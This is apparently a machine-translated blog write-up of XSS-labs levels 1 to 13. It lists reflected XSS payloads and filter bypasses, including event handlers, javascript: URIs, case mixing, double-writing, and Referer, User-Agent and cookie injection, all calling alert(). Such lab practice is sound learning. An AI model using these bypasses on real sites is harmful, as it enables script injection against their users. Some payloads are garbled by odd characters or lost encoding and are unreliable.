当前位置:网站首页>Web security XSS foundation 06
Web security XSS foundation 06
2022-06-24 22:35:00 【Stray. io】
XSS-labs Range practice 1~13
The first level

The second level

input Property value of label value in , closed ">, structure payload
"><script>alert(123)<script>

The third level
View page source code , Need to close Single quotation marks and >
structure payload:
'><script>alert(1)</script>
Find out <> It's materialized



payload:
' οnmοuseοver='alert(123)'
' οnmοusemοve='alert(123)'

The fourth level
<> The filtered

structure payload:
" οnmοusemοve="alert(123)

The fifth level
payload:
">123acada<script>alert(1)</script>
Find out script A bar was added in the middle

Try mouse events :
" onmousemove='alert(123)'
Still added _
Try js Fake protocol
Is the use of a Labeled href To run the javascript Methods
there script Not filtered !
"> <a href=javascript:alert('xss') > xss</a>

The sixth level
script,on start , as well as href It's all restricted
At this point, it suddenly occurred to me that case bypass ........... The previous ones should be able to do the same :
payload:
"><ScRipt>alert(1)</script>

The seventh level
script Filtered !
Try double write bypass :
payload:
"><scscriptript>alert(1)</scscriptript>

The eighth level
You can add links ,enmm Try JAVASCRIPT Fake protocol

javascript:alert(1)
Limited
Try case :
javaScRipt:alert(1)
Still can't get around .
Try encoding to bypass :
javascript:alert(1)
Put... Directly scirpt Turn into substance script
payload:
javascript:alert(1)

The Ninth level
The Ninth level is one more judgment than the eighth level , Determine whether the link is legal
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href=" Your link is illegal ? Is there any !"> link </a></center>';
}
payload:
javascript:alert('http://xss')

The tenth level
No clue , Looking at the source code, you will find that there are three input label , It seems to be through t_sort To pass parameters , But the labels are hidden , We can only construct our own buttons , Triggering event

payload:
&t_sort="123" type="text" onclick="alert('xss')

The eleventh level
View the source code :
Found one more $str11=$_SERVER['HTTP_REFERER'];
referer The ginseng
It seems that you need to add referer head , The added value is passed in t_ref in

structure payload1:
Create a button , Click to trigger xss
referer: click me!" type="button" οnclick="alert(xss)

payload2:
Create a text box , Move the mouse to trigger xss
referer:123" type="text" οnmοuseοver="alert('123')

Pass 12

UA Just inject it at , structure payload:
click me!" type="button" οnclick="alert('xss')


Level 13
cookie Injection at
payload ditto 

边栏推荐
- The ktp900f mobile download program of the fail safe mobile panel prompts that the download cannot be performed, and the target device is running or not in the transmission mode
- Rip protocol of dynamic routing protocol
- Technology inventory: Technology Evolution and Future Trend Outlook of cloud native Middleware
- 直播软件app开发,左右自动滑动的轮播图广告
- 华大4A0GPIO设置
- Short video mall system, how does scroll view adapt to the remaining height of the page
- In the multi network card environment, the service IP registered by Nacos is incorrect, resulting in inaccessible services
- Idea global search replace shortcut key
- Kubevela v1.2 release: the graphical operation console velaux you want is finally here
- Virtual private network foundation
猜你喜欢

Use of selector for NiO multiplexing

Layer 2 and layer 3 forwarding principle based on VLAN

socket(1)

故障安全移动面板KTP900F Mobile下载程序提示无法下载,目标设备正在运行或未处于传输模式的解决办法

【个人实验报告】

The logic of "Ali health" has long changed
CA Zhouji - the first lesson in 2022 rust

Virtual private network foundation

1. fully explain the basic principles of IPSec

无心剑汉英双语诗003. 《书海》
随机推荐
Idea close global search box
Short video mall system, how does scroll view adapt to the remaining height of the page
CSRF and SSRF for web attacks
重磅!法大大上榜“专精特新”企业
Docker 安装 Redis-5.0.12,详细步骤
电力系统| IEEE论文投稿流程
无心剑汉英双语诗003. 《书海》
华大4A0GPIO设置
YGG 近期游戏合作伙伴一览
Valueerror: cannot take a larger sample than population when 'replace=false‘
60 divine vs Code plug-ins!!
Yyds dry goods inventory junit5 learning II: assumptions class
证件照处理
First order model realizes photo moving (with tool code) | machine learning
Chapter 10 project communication management
String exercise summary 2
干货丨产品的可行性分析要从哪几个方面入手?
第二批入围企业公示!年度TOP100智能网联供应商评选
关于自动控制原理资料更新
Firewall working principle and detailed conversation table